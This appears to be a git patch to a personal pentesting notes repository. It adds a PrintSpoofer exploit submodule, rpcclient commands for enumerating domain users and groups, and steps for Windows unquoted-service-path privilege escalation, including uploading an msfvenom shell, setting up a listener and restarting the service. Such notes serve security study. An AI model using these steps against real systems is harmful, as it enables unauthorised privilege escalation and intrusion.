From 32fa6a672b29b24a186d4d2c47e22aa08c8efec0 Mon Sep 17 00:00:00 2001
From: whx
Date: Sat, 26 Feb 2022 01:01:44 +0100
Subject: [PATCH] bump

---
 .gitmodules | 3 +++
 enumeration/windows/bloodhound.md | 3 +++
 enumeration/windows/rpcclient.md | 10 ++++++++++
 exploit/windows/docs/unquoted_path.md | 24 ++++++++++++++++++++++++
 exploit/windows/printspoofer | 1 +
 5 files changed, 41 insertions(+)
 create mode 100644 enumeration/windows/bloodhound.md
 create mode 100644 enumeration/windows/rpcclient.md
 create mode 160000 exploit/windows/printspoofer

diff --git a/.gitmodules b/.gitmodules
index 5ca311d..06838ac 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -136,3 +136,6 @@
 [submodule "stego/stego-toolkit"]
 	path = stego/stego-toolkit
 	url = https://github.com/DominicBreuker/stego-toolkit.git
+[submodule "exploit/windows/printspoofer"]
+	path = exploit/windows/printspoofer
+	url = https://github.com/dievus/printspoofer.git
diff --git a/enumeration/windows/bloodhound.md b/enumeration/windows/bloodhound.md
new file mode 100644
index 0000000..3d92bb8
--- /dev/null
+++ b/enumeration/windows/bloodhound.md
@@ -0,0 +1,3 @@
+# Bloodhound
+
+* DNS
diff --git a/enumeration/windows/rpcclient.md b/enumeration/windows/rpcclient.md
new file mode 100644
index 0000000..315e8a2
--- /dev/null
+++ b/enumeration/windows/rpcclient.md
@@ -0,0 +1,10 @@
+# RPCclient
+
+* Enumerate users and groups
+
+```sh
+rpcclient
+rpcclient $> enumdomusers
+...
+rpcclient $> enumdomgroups
+```
diff --git a/exploit/windows/docs/unquoted_path.md b/exploit/windows/docs/unquoted_path.md
index 0e89282..5ddd0f5 100644
--- a/exploit/windows/docs/unquoted_path.md
+++ b/exploit/windows/docs/unquoted_path.md
@@ -14,3 +14,27 @@
 copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
 net start
 ```
+## Intel about Service
+
+* Access should contain writeable
+```sh
+Get-Acl -Path | Format-List
+```
+
+* Save the script [Get-ServiceAcl.ps1](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) and `Import-Module Get-ServiceAcl.ps1`
+
+* Check `ServiceRights` via
+```sh
+"" | Get-ServiceAcl | select ExpandProperty Access
+```
+
+## Interacting with the Service
+
+* Upload msfvenom shell to the writeable path, setup listener and
+```sh
+sc start "servicename"
+Stop-Service -name "servicename"
+Start-Service -name "servicename"
+```
+
+
diff --git a/exploit/windows/printspoofer b/exploit/windows/printspoofer
new file mode 160000
index 0000000..29a9e27
--- /dev/null
+++ b/exploit/windows/printspoofer
@@ -0,0 +1 @@
+Subproject commit 29a9e27f5418317bd5f4560ccfebcb65ca181b32